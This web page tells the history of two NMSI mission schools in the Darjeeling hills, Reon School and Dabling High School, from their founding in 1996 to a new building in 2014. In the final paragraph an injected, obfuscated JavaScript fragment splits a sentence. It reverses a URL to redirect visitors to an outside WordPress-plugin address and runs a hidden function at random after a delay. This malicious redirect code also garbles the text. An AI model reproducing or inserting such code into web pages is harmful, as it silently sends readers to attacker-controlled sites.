Reon School

NMSI Sadhu Sunder Singh School was started in the remote village Reon, Dabling of Eastern Himalayan hills in the Darjeeling district. It was started on 1st August 1996 by B. T. Lepcha, NMS Missionary.

This school plays a very important role in educating the tribal children who are not able to walk hours to reach the other government schools. Initially the school was conducted in a thatched shed and the number of children began to increase. The parents of the local villages were very happy as their children started to go to school in this nearby place. The commitment of the NMSI teachers drew more children to the school as well as got good response from the local community. The drastic change in the children’s characters and behaviour brought appreciation from various avenues. At this point, in the year 2007, NMSI built a small building to accommodate these needy children in the Reon village. Now this school is providing primary level education to the children who are under privileges.

Dabling High School

The Parents of Reon and Dabling wished to send their children for the higher classes at NMSI School itself, because the Government High School is very far from many villages and as many children had to walk more than five hours to and fro. So, we had to upgrade the primary school in to high school. NMSI was able to purchase 1.25 acre of land for a minimal price in the Dabling area and built small temporary bamboo class rooms for the high school students in the year 2011. Though there were limited facilities in the bamboo made class rooms, teachers worked hard to bring a good reputation to the NMSI School and the first batch of class X (Madhyamik) students passed out. Besides, students were excellent in sports and other extra-curricular activities. Other well established schools exclaimed and were surprised to see the development of NMSI School which is located in such a remote area.

In the mean time NMS started to raise funds to build a High school building. By the grace of Almighty God, the High School building project was completed and was dedicated on 24th May 2014. There are 16 small villages and communities surrounding this NMSI School which are btog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}eing benefited by the school ministry of NMSI. Many teenage students’ lives are transformed through the sacrificial and model life of teachers and missionaries of NMSI. Because of our School’s presence, the villagers are able to receive road and water facilities through different NGOs.
